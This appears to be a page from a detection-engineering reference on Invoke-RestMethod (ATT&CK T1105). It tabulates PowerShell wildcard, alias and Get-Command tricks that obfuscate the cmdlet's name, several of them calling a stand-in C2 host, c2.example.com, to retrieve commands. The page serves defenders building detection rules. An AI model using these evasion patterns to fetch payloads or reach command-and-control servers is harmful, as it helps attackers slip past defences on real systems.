Invoke-RestMethod

PowerShell download T1105

Send HTTP/HTTPS requests and receive structured responses. Used for C2 communication, API interactions, and payload retrieval.

Binary Paths

Pattern	Notes
`& (gcm I-RM*) -Uri http://c2.example.com/cmd`	Wildcards in verb and both parts of noun
`& (gcm Invoke-Rest*) -Uri ...`	Star matches 'Method'
`& (gcm I*ke-RestMethod) -Uri ...`	Wildcard in verb only
`& (gcm *RestMethod) -Uri ...`	Prefix wildcard
`irm -Uri ...`	Built-in alias 'irm' — not a glob but used in combination
`& (gcm Invok[d-f]-RestMethod) -Uri ...`	Character range matches 'e' in Invoke
`& (gal ir?) -Uri ...`	Get-Alias with wildcard resolves 'irm'
`& (gcm -Restod) -Uri ...`	Multiple wildcards with partial matching
`& (DIR Alias:/ir?) -Uri http://...`	Resolves irm alias via PowerShell's Alias: PSDrive glob
`& (gcm * \| ? Name -match 'Rest') -Uri http://c2.example.com/cmd`	Regex -match filter on all commands via Where-Object pipeline — 'Rest' uniquely matches Invoke-RestMethod
`& (Get-Command -Verb Inv* -Noun *RestMethod) -Uri http://c2.example.com/cmd`	Get-Command -Verb/-Noun structured split — wildcards on verb and noun independently narrow the match to Invoke-RestMethod
`& (gcm Microsoft.PowerShell.Utility\Inv-Rest) -Uri http://c2.example.com/cmd`	Module-qualified wildcard — forces resolution within Microsoft.PowerShell.Utility while using glob patterns on the cmdlet name

Try typing Invoke-RestMethod or a full path like PowerShell cmdlet

Auto-generated detection rule for Invoke-RestMethod